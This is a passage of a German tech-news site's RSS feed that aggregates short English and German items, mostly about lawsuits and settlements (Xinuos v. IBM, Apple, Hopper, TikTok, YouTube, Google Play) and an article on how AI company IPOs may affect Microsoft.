<description><![CDATA[The long-running SCO/IBM Unix and Linux ownership dispute has resurfaced yet again, this time through SCO successor Xinuos, which is trying to pursue old license and copyright claims tied to Project Monterey. "The core issue seems to be whether Xinuos even has the right to litigate the matter, or...]]></description>
<link>https://tsecurity.de/de/3649779/it-security-nachrichten/zombie-who-owns-unix-lawsuit-comes-alive-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649779/it-security-nachrichten/zombie-who-owns-unix-lawsuit-comes-alive-again/</guid>
<pubDate>Mon, 06 Jul 2026 22:07:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The long-running SCO/IBM Unix and Linux ownership dispute has resurfaced yet again, this time through SCO successor Xinuos, which is trying to pursue old license and copyright claims tied to Project Monterey. "The core issue seems to be whether Xinuos even has the right to litigate the matter, or if some ancient legalese in the original agreements means the window for legal argument has long since expired," reports The Register. From the report: [T]he roots of the case are the 1998 alliance between IBM and a company called the Santa Cruz Operation which sold a version of UNIX for x86 CPUs. Those two companies, plus Intel and Sequent, created "Project Monterey" -- an effort to create a unified version of UNIX that could run on multiple processors. By 2001, Project Monterey was close to delivering a unified UNIX, an achievement made possible by blending code from IBM and SCO.
 
By then, a little project called "Linux" already ran on multiple processors. Big Blue decided Linux was the future and bailed from Project Monterey -- then allegedly contributed some Monterey code to the open-source project and to its own AIX and Z operating systems. SCO felt it owned some of that code, so sued IBM.
 
SCO and its successors struggled to survive, but interested parties kept the lawsuit alive because the chance to emerge as owner of parts of the Linux codebase, and IBM's code, had the potential to turn into a colossal payday. The case and its successors ended in 2021, with a settlement that saw litigants agree to end the matter without IBM admitting fault. But by then, SCO had sold its software to a biz called Xinuos that decided to fight on.
 
The Xinuos case has burbled along quietly since, and on June 22nd reached the milestone of a hearing. The matter has become a little more modern, if only because this hearing was held online and the presiding judge appeared to unwittingly be on mute at one point. But the arguments otherwise seemed to revisit Project Monterey, debated the relevance of past litigation, contested who owned what, when they owned it, and how they could prove it. Xinuos argued IBM never had a license for SCO code. Big Blue argued that it did nothing wrong.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Zombie+'Who+Owns+Unix%3F'+Lawsuit+Comes+Alive+Again%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F06%2F1844204%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F06%2F1844204%2Fzombie-who-owns-unix-lawsuit-comes-alive-again%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/06/1844204/zombie-who-owns-unix-lawsuit-comes-alive-again?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s $250M AI iPhone Settlement: Who Qualifies and How Much You Could Get]]></title>
<description><![CDATA[Apple agreed to a $250 million settlement over claims related to Siri and Apple Intelligence. See who qualifies and how much eligible iPhone buyers may get.]]></description>
<link>https://tsecurity.de/de/3649374/it-nachrichten/apples-250m-ai-iphone-settlement-who-qualifies-and-how-much-you-could-get/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649374/it-nachrichten/apples-250m-ai-iphone-settlement-who-qualifies-and-how-much-you-could-get/</guid>
<pubDate>Mon, 06 Jul 2026 18:36:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple agreed to a $250 million settlement over claims related to Siri and Apple Intelligence. See who qualifies and how much eligible iPhone buyers may get.]]></content:encoded>
</item>
<item>
<title><![CDATA[Travel app Hopper to pay $35M in FTC settlement over ‘unfairly’ charging hidden fees]]></title>
<description><![CDATA[Hopper will pay $35 million to settle FTC allegations that it used deceptive “dark patterns” to hide fees and mislead travelers about the cost and benefits of services.]]></description>
<link>https://tsecurity.de/de/3642046/it-nachrichten/travel-app-hopper-to-pay-35m-in-ftc-settlement-over-unfairly-charging-hidden-fees/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642046/it-nachrichten/travel-app-hopper-to-pay-35m-in-ftc-settlement-over-unfairly-charging-hidden-fees/</guid>
<pubDate>Thu, 02 Jul 2026 20:48:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hopper will pay $35 million to settle FTC allegations that it used deceptive “dark patterns” to hide fees and mislead travelers about the cost and benefits of services.]]></content:encoded>
</item>
<item>
<title><![CDATA[Visa, Mastercard and Coinbase have launched a new global stablecoin]]></title>
<description><![CDATA[A new stablecoin venture backed by some big financial institutions is launching.]]></description>
<link>https://tsecurity.de/de/3639163/it-nachrichten/visa-mastercard-and-coinbase-have-launched-a-new-global-stablecoin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639163/it-nachrichten/visa-mastercard-and-coinbase-have-launched-a-new-global-stablecoin/</guid>
<pubDate>Wed, 01 Jul 2026 18:31:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new stablecoin venture backed by some big financial institutions is launching.]]></content:encoded>
</item>
<item>
<title><![CDATA[TikTok Finalises Settlement Ahead Of Addiction Trial]]></title>
<description><![CDATA[ByteDance’s TikTok reportedly working on settlement with 15-year-old boy ahead of second landmark trial this month This article has been indexed from Silicon UK Read the original article: TikTok Finalises Settlement Ahead Of Addiction Trial
Read more →
The post TikTok Finalises Settlement Ahead O...]]></description>
<link>https://tsecurity.de/de/3637736/it-security-nachrichten/tiktok-finalises-settlement-ahead-of-addiction-trial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637736/it-security-nachrichten/tiktok-finalises-settlement-ahead-of-addiction-trial/</guid>
<pubDate>Wed, 01 Jul 2026 09:35:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>ByteDance’s TikTok reportedly working on settlement with 15-year-old boy ahead of second landmark trial this month This article has been indexed from Silicon UK Read the original article: TikTok Finalises Settlement Ahead Of Addiction Trial</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/tiktok-finalises-settlement-ahead-of-addiction-trial/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/tiktok-finalises-settlement-ahead-of-addiction-trial/">TikTok Finalises Settlement Ahead Of Addiction Trial</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Remembering How Microsoft's Fake Windows Error Ended In a $280 Million Secret Settlement]]></title>
<description><![CDATA[Slashdot reader joshuark summarizes this walk down memory lane from the tech site MakeUseOf:
Facing real competition from Digital Research's DR DOS, Microsoft secretly embedded a sabotaging mechanism known as "AARD code" into beta versions of Windows 3.1 to prevent it from running on Digital Rese...]]></description>
<link>https://tsecurity.de/de/3635302/it-security-nachrichten/remembering-how-microsofts-fake-windows-error-ended-in-a-280-million-secret-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635302/it-security-nachrichten/remembering-how-microsofts-fake-windows-error-ended-in-a-280-million-secret-settlement/</guid>
<pubDate>Tue, 30 Jun 2026 12:52:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Slashdot reader joshuark summarizes this walk down memory lane from the tech site MakeUseOf:
Facing real competition from Digital Research's DR DOS, Microsoft secretly embedded a sabotaging mechanism known as "AARD code" into beta versions of Windows 3.1 to prevent it from running on Digital Research's competing DR DOS operating system.This code triggered fake, alarming error messages to convince developers that DR DOS was unstable... Although Microsoft disabled the feature in the final retail release, the California-based firm Caldera, Inc., which had acquired DR DOS assets, sued Microsoft for anti-competitive practices.Microsoft settled the lawsuit out of court in 2000 for $280 million, a figure that remained sealed until it was unsealed in 2009.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Remembering+How+Microsoft's+Fake+Windows+Error+Ended+In+a+%24280+Million+Secret+Settlement%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F06%2F29%2F0642256%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F06%2F29%2F0642256%2Fremembering-how-microsofts-fake-windows-error-ended-in-a-280-million-secret-settlement%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/06/29/0642256/remembering-how-microsofts-fake-windows-error-ended-in-a-280-million-secret-settlement?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[If you kill every Fable NPC, Playground Games says the world will 'stay empty for some time' before being repopulated by 'full NPCs']]></title>
<description><![CDATA[Playground Games has confirmed that if Fable players, for some reason, decide to kill every NPC in a settlement, they will repopulate over time.]]></description>
<link>https://tsecurity.de/de/3634911/it-nachrichten/if-you-kill-every-fable-npc-playground-games-says-the-world-will-stay-empty-for-some-time-before-being-repopulated-by-full-npcs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634911/it-nachrichten/if-you-kill-every-fable-npc-playground-games-says-the-world-will-stay-empty-for-some-time-before-being-repopulated-by-full-npcs/</guid>
<pubDate>Tue, 30 Jun 2026 10:16:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Playground Games has confirmed that if Fable players, for some reason, decide to kill every NPC in a settlement, they will repopulate over time.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ukraine überträgt 8,3 Millionen USD an beschlagnahmten Krypto-Assets in staatliche Verwaltung]]></title>
<description><![CDATA[Beschlagnahmte Kryptowährung aus einem internationalen Hacker-Fall. Die beschlagnahmte Kryptowährung ist Tether (USDT), der größte Stablecoin. Zum ...]]></description>
<link>https://tsecurity.de/de/3634200/hacking/ukraine-uebertraegt-83-millionen-usd-an-beschlagnahmten-krypto-assets-in-staatliche-verwaltung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634200/hacking/ukraine-uebertraegt-83-millionen-usd-an-beschlagnahmten-krypto-assets-in-staatliche-verwaltung/</guid>
<pubDate>Tue, 30 Jun 2026 00:50:01 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Beschlagnahmte Kryptowährung aus einem internationalen <b>Hacker</b>-Fall. Die beschlagnahmte Kryptowährung ist Tether (USDT), der größte Stablecoin. Zum ...]]></content:encoded>
</item>
<item>
<title><![CDATA[‘We’re up against forces that have all the money in the world’: Erin Brockovich on her battle against AI datacentres]]></title>
<description><![CDATA[In 1993, she squeezed a $333m settlement from a Californian energy company in a scandal over contaminated water. Three decades later, she has a new target in her sights – and it’s globalWhen Erin Brockovich woke to find 30 emails from people from the same town, she realised something was going on...]]></description>
<link>https://tsecurity.de/de/3631883/ai-nachrichten/were-up-against-forces-that-have-all-the-money-in-the-world-erin-brockovich-on-her-battle-against-ai-datacentres/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631883/ai-nachrichten/were-up-against-forces-that-have-all-the-money-in-the-world-erin-brockovich-on-her-battle-against-ai-datacentres/</guid>
<pubDate>Mon, 29 Jun 2026 06:03:05 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In 1993, she squeezed a $333m settlement from a Californian energy company in a scandal over contaminated water. Three decades later, she has a new target in her sights – and it’s global</p><p>When Erin Brockovich woke to find 30 emails from people from the same town, she realised something was going on. People email Brockovich all the time because of what happened in 1993, when she was instrumental in suing Pacific Gas and Electric Company (PG&amp;E) on behalf of residents of the town of Hinkley, California, whose groundwater had been contaminated. The case resulted in a settlement of $333m – then the largest ever payout for a direct-action lawsuit. When she was immortalised by Julia Roberts in the 2000 film Erin Brockovich, she became the hero we didn’t know we needed, a modern day Joan of Arc. She had won against PG&amp;E with no formal legal training.</p><p>The emails she received a few weeks ago were about datacentres. In April, she put a callout on her website asking for anyone with concerns about one near them to get in touch. Within a month, 3,862 people had replied. Tech companies have needed datacentres to power their technology “for ever”, she says, but the new ones being built to power AI? “This feels like Hinkley on steroids.”</p> <a href="https://www.theguardian.com/environment/2026/jun/29/were-up-against-forces-that-have-all-the-money-in-the-world-erin-brockovich-on-her-battle-against-ai-datacentres">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[MiniPay von Opera startet Visa-Debitkarte für Stablecoin-Nutzer]]></title>
<description><![CDATA[Das zu Opera gehörende Stablecoin-Wallet MiniPay erweitert sein Angebot und bringt gemeinsam mit Visa und Gnosis Pay eine digitale Visa-Debitkarte an den Start. Die neue MiniPay Card richtet sich an Nutzer in ausgewählten Märkten in Europa (EWR), Afrika, Lateinamerika und...Zum Beitrag: MiniPay v...]]></description>
<link>https://tsecurity.de/de/3629925/it-nachrichten/minipay-von-opera-startet-visa-debitkarte-fuer-stablecoin-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629925/it-nachrichten/minipay-von-opera-startet-visa-debitkarte-fuer-stablecoin-nutzer/</guid>
<pubDate>Sat, 27 Jun 2026 19:17:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das zu Opera gehörende Stablecoin-Wallet MiniPay erweitert sein Angebot und bringt gemeinsam mit Visa und Gnosis Pay eine digitale Visa-Debitkarte an den Start. Die neue MiniPay Card richtet sich an Nutzer in ausgewählten Märkten in Europa (EWR), Afrika, Lateinamerika und...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/minipay-von-opera-startet-visa-debitkarte-fuer-stablecoin-nutzer/">MiniPay von Opera startet Visa-Debitkarte für Stablecoin-Nutzer</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[$586M FTC Western Union fraud settlement phase 3]]></title>
<description><![CDATA[Western Union has made $586 million available in the third phase of remission payments stemming from a 2017 deferred prosecution agreement with federal authorities. This article has been indexed from CyberMaterial Read the original article: $586M FTC Western Union fraud…
Read more →
The post $586...]]></description>
<link>https://tsecurity.de/de/3627879/it-security-nachrichten/586m-ftc-western-union-fraud-settlement-phase-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627879/it-security-nachrichten/586m-ftc-western-union-fraud-settlement-phase-3/</guid>
<pubDate>Fri, 26 Jun 2026 17:53:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Western Union has made $586 million available in the third phase of remission payments stemming from a 2017 deferred prosecution agreement with federal authorities. This article has been indexed from CyberMaterial Read the original article: $586M FTC Western Union fraud…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/586m-ftc-western-union-fraud-settlement-phase-3/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/586m-ftc-western-union-fraud-settlement-phase-3/">$586M FTC Western Union fraud settlement phase 3</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[YouTube Exits Teen Addiction Lawsuit as Meta, TikTok, Snapchat Head to Trial]]></title>
<description><![CDATA[Google settled YouTube claims brought by a Florida teen, leaving Meta, TikTok, and Snap to face a July trial over social media addiction.
The post YouTube Exits Teen Addiction Lawsuit as Meta, TikTok, Snapchat Head to Trial appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3625898/it-nachrichten/youtube-exits-teen-addiction-lawsuit-as-meta-tiktok-snapchat-head-to-trial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625898/it-nachrichten/youtube-exits-teen-addiction-lawsuit-as-meta-tiktok-snapchat-head-to-trial/</guid>
<pubDate>Thu, 25 Jun 2026 23:32:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google settled YouTube claims brought by a Florida teen, leaving Meta, TikTok, and Snap to face a July trial over social media addiction.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-google-youtube-addiction-lawsuit-settlement/">YouTube Exits Teen Addiction Lawsuit as Meta, TikTok, Snapchat Head to Trial</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Starts Lowering Play Store Fees, Making Good On Epic Games Settlement]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Google spent the last few years locked in a legal grudge match with Epic Games, which claimed that Google's stewardship of the Play Store was anticompetitive. Now, the companies are thick as thieves, and Google is beginning to implement app s...]]></description>
<link>https://tsecurity.de/de/3625061/it-security-nachrichten/google-starts-lowering-play-store-fees-making-good-on-epic-games-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625061/it-security-nachrichten/google-starts-lowering-play-store-fees-making-good-on-epic-games-settlement/</guid>
<pubDate>Thu, 25 Jun 2026 17:23:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Google spent the last few years locked in a legal grudge match with Epic Games, which claimed that Google's stewardship of the Play Store was anticompetitive. Now, the companies are thick as thieves, and Google is beginning to implement app store changes as agreed in its settlement with Epic. The lower developer fees and new payment options that Google promised are rolling out in select markets this month before expanding. [...] Starting on June 30, developers in Europe, the UK, and the US will have access to the new fee structure. This system will split the commission into two components: billing and service fees.
 
The biggest win for small developers is the new flat 10 percent service fee for the first $1 million in earnings every year. Above that, the rate for various transaction types may reach 25 percent on existing installs. Apps installed after June 30 will top out at 20 percent. Developers will finally be allowed to send users outside the Play Store to complete a transaction, too. Google says they can design a choice screen "in accordance with our UX guidelines" to direct users to these external options. Devs pay the standard service fee on these purchases, but they'll avoid the billing fee. All transactions that run through Google's Play Store platform add a 5 percent billing fee -- even the base rate for publishers earning less than $1 million. Google notes that the billing fee is set at 5 percent in the initial markets, but it could be different in other regions. Google will expand the new fee structure globally through September 2027, while also offering reduced fees through updated developer programs.
 
Although the changes may let developers retain more revenue, Google will continue controlling Android distribution and collecting a share of sales as it works toward allowing certified third-party app stores to operate more like the Play Store.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Google+Starts+Lowering+Play+Store+Fees%2C+Making+Good+On+Epic+Games+Settlement%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F25%2F0554234%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F06%2F25%2F0554234%2Fgoogle-starts-lowering-play-store-fees-making-good-on-epic-games-settlement%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/06/25/0554234/google-starts-lowering-play-store-fees-making-good-on-epic-games-settlement?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[YouTube Settles With Teenager Over Addictiveness Claims]]></title>
<description><![CDATA[Google’s YouTube reaches settlement ahead of second landmark case, after Los Angeles jury finds platforms liable for mental health harms This article has been indexed from Silicon UK Read the original article: YouTube Settles With Teenager Over Addictiveness Claims
Read more →
The post YouTube Se...]]></description>
<link>https://tsecurity.de/de/3623618/it-security-nachrichten/youtube-settles-with-teenager-over-addictiveness-claims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623618/it-security-nachrichten/youtube-settles-with-teenager-over-addictiveness-claims/</guid>
<pubDate>Thu, 25 Jun 2026 09:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google’s YouTube reaches settlement ahead of second landmark case, after Los Angeles jury finds platforms liable for mental health harms This article has been indexed from Silicon UK Read the original article: YouTube Settles With Teenager Over Addictiveness Claims</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/youtube-settles-with-teenager-over-addictiveness-claims/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/youtube-settles-with-teenager-over-addictiveness-claims/">YouTube Settles With Teenager Over Addictiveness Claims</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[North Carolina AG’s Settlement Bars Rent-Setting Algorithm]]></title>
<description><![CDATA[A $7 million settlement state Attorney General Jeff Jackson reached with landlord LivCor keeps the company from using so-called algorithmic pricing to set rents or share data with other landlords.]]></description>
<link>https://tsecurity.de/de/3622770/ai-nachrichten/north-carolina-ags-settlement-bars-rent-setting-algorithm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622770/ai-nachrichten/north-carolina-ags-settlement-bars-rent-setting-algorithm/</guid>
<pubDate>Wed, 24 Jun 2026 22:34:19 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A $7 million settlement state Attorney General Jeff Jackson reached with landlord LivCor keeps the company from using so-called algorithmic pricing to set rents or share data with other landlords.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s new rules for the app store will allow alternative billing next week]]></title>
<description><![CDATA[While the court still hasn't signed off on the massive settlement resolving Epic's antitrust lawsuit against Google for having a monopoly over Android's app store with Google Play, the tech giant says it will start rolling out changes to the way it handles billing for developers worldwide. As ann...]]></description>
<link>https://tsecurity.de/de/3622359/it-nachrichten/googles-new-rules-for-the-app-store-will-allow-alternative-billing-next-week/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622359/it-nachrichten/googles-new-rules-for-the-app-store-will-allow-alternative-billing-next-week/</guid>
<pubDate>Wed, 24 Jun 2026 20:03:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[While the court still hasn't signed off on the massive settlement resolving Epic's antitrust lawsuit against Google for having a monopoly over Android's app store with Google Play, the tech giant says it will start rolling out changes to the way it handles billing for developers worldwide. As announced in March, the flat 30 percent […]]]></content:encoded>
</item>
<item>
<title><![CDATA[What do the IPOs for SpaceX, OpenAI and Anthropic mean for Microsoft?]]></title>
<description><![CDATA[The AI IPO tsunami on the stock market has only recently gotten under way, with SpaceX’s more-than-$2 trillion IPO likely to be followed in several months by OpenAI’s and Anthropic’s IPOs — each of which is likely to hit $1 trillion.



That will mint three new trillion-dollar AI companies in a m...]]></description>
<link>https://tsecurity.de/de/3621138/it-nachrichten/what-do-the-ipos-for-spacex-openai-and-anthropic-mean-for-microsoft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621138/it-nachrichten/what-do-the-ipos-for-spacex-openai-and-anthropic-mean-for-microsoft/</guid>
<pubDate>Wed, 24 Jun 2026 13:18:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The AI IPO tsunami on the stock market has only recently gotten under way, with SpaceX’s more-than-$2 trillion IPO likely to be followed in several months by OpenAI’s and Anthropic’s IPOs — each of which is likely to hit $1 trillion.</p>



<p>That will mint three new trillion-dollar AI companies in a matter of months, all of which compete with Microsoft. </p>



<p>Wall Street has never seen anything like it. Previously, the most money raised by all IPOs in a single year was <a href="https://kpmg.com/xx/en/media/press-releases/2022/01/global-venture-capital-annual-investment-shatters-records-following-another-healthy-quarter.html" target="_blank" rel="noreferrer noopener">$671 billion in 2021</a>. It took 38,644 deals to get to that figure. Compare that to three deals this year that by themselves will likely total $4 trillion.</p>



<p>The numbers are eye-popping. </p>



<p>For Microsoft though, it’s not the numbers themselves that are important. It’s what will happen to the company once it as three newly minted trillion-dollar AI competitors. Until recently, when it came to AI, Microsoft was king of the hill. But can it keep that place?</p>



<h2 class="wp-block-heading">Microsoft’s weakened position</h2>



<p>The IPOs come at a particularly fraught time for Microsoft. At one point, it was the most valuable AI company in the world, with a big head start on the tech industry.</p>



<p>No longer. Microsoft’s stock price has tanked in the past 12 months, even as the S&amp;P index has soared. In the last year, <a href="https://www.alphaspread.com/comparison/nasdaq/msft/vs/indx/gspc" target="_blank" rel="noreferrer noopener">Microsoft’s stock price has dropped 24%, while the S&amp;P has jumped 24%</a>. The two were pretty much in sync until last fall..</p>



<p>Microsoft has fared even worse against its most powerful AI competitor, Google. In June 2025, Google’s total value was $2.1 trillion, well behind Microsoft’s  $3.57 trillion. By  mid-June this year Google was worth $4.5 trillion, Microsoft, $2.8 trillion. That’s entirely due to Google’s AI push and Microsoft’s failure to improve Copilot significantly.</p>



<p>Matt Vellosso, who worked for Microsoft for 14 years — including four as technical advisor to CEO Satya Nadella and then as Partner Director for fostering AI innovation in Windows before leaving in 2023 — is scathing about what he views as Microsoft’s AI failures. </p>



<p><a href="https://www.windowslatest.com/2026/05/17/former-microsoft-vp-says-microsoft-missed-the-ai-wave-like-the-internet-and-mobile-as-copilot-scales-back-in-windows-11/" target="_blank" rel="noreferrer noopener">He warned</a>: “Microsoft missed the internet wave, the mobile wave and now it missed the AI wave.”</p>



<h2 class="wp-block-heading">Show me the money</h2>



<p>The most immediate likely impact on Microsoft after the three massive IPOs take place will be on the company’s stock price, which could well take another hit. Investors don’t want to miss out on the AI boom, and until now, there’s been a relatively small number of companies in which they could. When Anthropic and OpenAI join SpaceX as publicly traded companies, investors will have three more choices than they did only a few months ago. That could make it tougher for Microsoft to attract AI-focused investors. And that, in turn, could knock down its stock price. </p>



<p>A lower stock price means the company will have a harder time raising money when it needs it. In addition, Microsoft won’t be able to as easily buy other companies in stock-only deals, because the value of its stock will be less.</p>



<p>Still, the IPOs are not all bad news for Microsoft’s stock position. It does, after all, own 27% of OpenAI. So if OpenAI is valued at $1 trillion after its IPO, Microsoft has a $270 billion stake in it.</p>



<h2 class="wp-block-heading">Thumbs up for increased Azure revenue</h2>



<p>One area where these mega IPOs should be unalloyed good news for Microsoft is in Azure revenue, which should significantly. Microsoft’s final divorce settlement with OpenAI requires the latter to buy $250 billion in Azure services through 2030. And its  estimated trillion-dollar valuation ensures the company will be around for the long term, meaning Microsoft can count on that revenue — and possibly more on an ongoing basis.</p>



<p>Microsoft will likely also get tens of billions of dollars from Anthropic for Azure cloud services. <a href="https://www.citybiz.co/article/851763/microsofts-anthropic-bet-could-deliver-43b-revenue-windfall-hsbc-says/" target="_blank" rel="noreferrer noopener">Anthropic might spend $43 billion annually on Azure cloud services</a> by 2030, according to estimates by HSBC, one of the world’s largest banking and financial services companies.</p>



<h2 class="wp-block-heading">Thumbs down for the effect on Copilot</h2>



<p>Although Azure use will boom thanks to the IPOs, Microsoft’s own Copilot could face significant competition at a time when it’s having serious problems gaining traction. In its April 2026 earnings call, the company said <a href="https://www.computerworld.com/article/4166676/microsoft-now-has-over-20-million-paying-copilot-users.html">Microsoft 365 Copilot had 20 million paid seats</a>. That’s up from 15 million paid seats as of January, but still a minuscule number, considering Microsoft has 450 million Microsoft 365 commercial subscribers. That means only about 4% of the company’s business customers have been willing to pay for it since its launch in late 2023.</p>



<p>Beyond that, developers have been leaving GitHub Copilot and turning to Anthropic’s Claude Code and SpaceX’s recently purchased Cursor. A survey by the software development company JetBrains of more than 10,000 developers found that <a href="https://pasqualepillitteri.it/en/news/3392/github-copilot-cursor-claude-code-ai-coding-showdown-2026#:~:text=The%2520most%2520telling%2520data%2520point,%2525%252C%2520Claude%2520Code%252018%2525." target="_blank" rel="noreferrer noopener">29% used GitHub Copilot, 18% used Cursor and 18% used Claude Code</a>. </p>



<p>Early in 2025, GitHub Copilot had a commanding 67% market share.</p>



<h2 class="wp-block-heading">More downside than up from the IPOs</h2>



<p>Although the IPOs do have some upside for Microsoft — dramatically increased Azure revenue and several hundred billion dollars in OpenAI stock holdings — mostly, they’re bad news thanks to increased competition. </p>



<p>Unless Microsoft significantly improves Copilot for businesses, developers and consumers, the company’s one-time AI dominance will erode even further.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
